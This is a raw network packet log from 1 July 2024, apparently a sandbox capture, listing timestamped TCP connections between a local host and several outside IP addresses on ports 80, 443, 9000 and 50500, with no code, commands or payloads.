Jul 1, 2024 09:16:19.866903067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.866940022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.866960049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.866980076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.866980076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.866997004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867003918 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.867012024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867029905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867033958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.867052078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.867079020 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.867753029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867809057 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.867918015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867937088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867954016 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867954969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.867969036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867983103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.867985964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.868011951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.868036032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.868285894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868304014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868319988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868335962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868339062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.868355036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868370056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868371010 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.868385077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.868400097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.868415117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869030952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869071007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869147062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869162083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869177103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869188070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869188070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869203091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869209051 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869225025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869241953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869242907 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869260073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869275093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869276047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869293928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869301081 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869321108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869342089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869734049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869750023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869765997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869771957 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869781971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869793892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869797945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.869807005 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869822979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.869842052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870321989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870340109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870353937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870363951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870369911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870378971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870384932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870393991 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870399952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870414019 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870423079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870436907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870441914 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870455980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870467901 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870471954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870484114 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870487928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870500088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870503902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870515108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870520115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.870532036 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870547056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.870563984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871433973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871452093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871469021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871474028 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871485949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871494055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871501923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871507883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871520042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871525049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871536970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871545076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871552944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871558905 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871570110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871582985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871587992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871603012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871618986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871620893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871634007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.871644020 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871659994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.871681929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872380972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872397900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872419119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872421980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872441053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872442007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872457981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872459888 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872473001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872478008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872503042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872507095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872507095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872520924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872536898 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872554064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.872560978 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.872596025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:20.122486115 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:20.157804012 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.157857895 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:20.157912970 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.159281969 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.159297943 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:20.238290071 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:20.238379955 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:20.571050882 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:20.571108103 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:20.571187019 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:20.575500011 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:20.575540066 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:20.655169964 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:20.655291080 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.656892061 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.656913042 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:20.657151937 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:20.845201015 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.848195076 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.848511934 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:20.848537922 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.207947016 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.208072901 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.238215923 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.238404036 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.238497972 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.263780117 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:21.349128008 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.349158049 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.349199057 CEST	49759	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.349205971 CEST	443	49759	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.360815048 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:21.413798094 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:21.419684887 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.419719934 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.419894934 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.421498060 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.421514034 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.437592983 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.437630892 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.438019991 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.438076973 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.448458910 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.472464085 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:21.472531080 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:21.472608089 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:21.476269960 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:21.476289988 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:21.492501020 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.532877922 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:21.537761927 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:21.634151936 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.634179115 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.634215117 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.634227037 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.634258986 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.634278059 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.634284019 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.634289980 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.634300947 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.634325981 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.680166006 CEST	49760	443	192.168.2.4	149.154.167.99
Jul 1, 2024 09:16:21.680197954 CEST	443	49760	149.154.167.99	192.168.2.4
Jul 1, 2024 09:16:21.696619034 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:21.701411963 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:21.702202082 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:21.708306074 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:21.713087082 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:21.911727905 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:21.914357901 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.914426088 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.915772915 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.915781975 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.916027069 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.916614056 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:21.917737961 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.917763948 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:21.917809010 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:21.941025019 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:21.941092968 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:21.942413092 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:21.942420006 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:21.942662001 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:21.991451025 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:22.036500931 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:22.118814945 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:22.118977070 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:22.119040966 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:22.119311094 CEST	49762	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:22.119328022 CEST	443	49762	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:22.130367994 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.130402088 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.130541086 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.130861044 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.130873919 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.325225115 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.325261116 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.325306892 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.325331926 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.325336933 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.325362921 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.325407028 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.325422049 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.325467110 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.325479031 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.326186895 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.326219082 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.326241016 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.326244116 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.326258898 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.326288939 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.326883078 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.326929092 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.326941967 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.387806892 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:22.387944937 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:22.388467073 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:22.389035940 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:22.416695118 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.416759968 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.416868925 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.416887999 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.416941881 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.417068958 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.417182922 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.417231083 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.461572886 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:22.463140965 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.463215113 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.463249922 CEST	49761	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.463268995 CEST	443	49761	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.466572046 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:22.516761065 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.516793013 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.516854048 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.518049002 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.518059969 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.608860970 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.608938932 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.610680103 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.610692978 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.610977888 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.612566948 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.660511971 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.661467075 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:22.661534071 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:22.662333965 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:22.668271065 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:22.789542913 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.789639950 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.789804935 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.790199995 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.790199995 CEST	49765	443	192.168.2.4	104.26.4.15
Jul 1, 2024 09:16:22.790199995 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:22.790235996 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.790245056 CEST	443	49765	104.26.4.15	192.168.2.4
Jul 1, 2024 09:16:22.795171022 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:22.985753059 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.985820055 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.987220049 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.987227917 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.987449884 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.989339113 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.989485025 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.989506006 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:22.989559889 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:22.989567041 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:23.114310980 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:23.114447117 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.128971100 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.133877039 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:23.133953094 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.134268045 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.139436007 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:23.480635881 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:23.480735064 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:23.480830908 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:23.485475063 CEST	49766	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:23.485497952 CEST	443	49766	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:23.525902987 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:23.525949955 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:23.526012897 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:23.526540041 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:23.526556015 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:23.801501989 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:23.801862001 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.815742970 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:23.849155903 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.854027033 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:23.854067087 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:23.859050035 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:23.876573086 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:23.881597996 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:24.008019924 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.008094072 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.012118101 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.012137890 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.012370110 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.013916016 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.014049053 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.014084101 CEST	443	49768	188.114.97.3	192.168.2.4
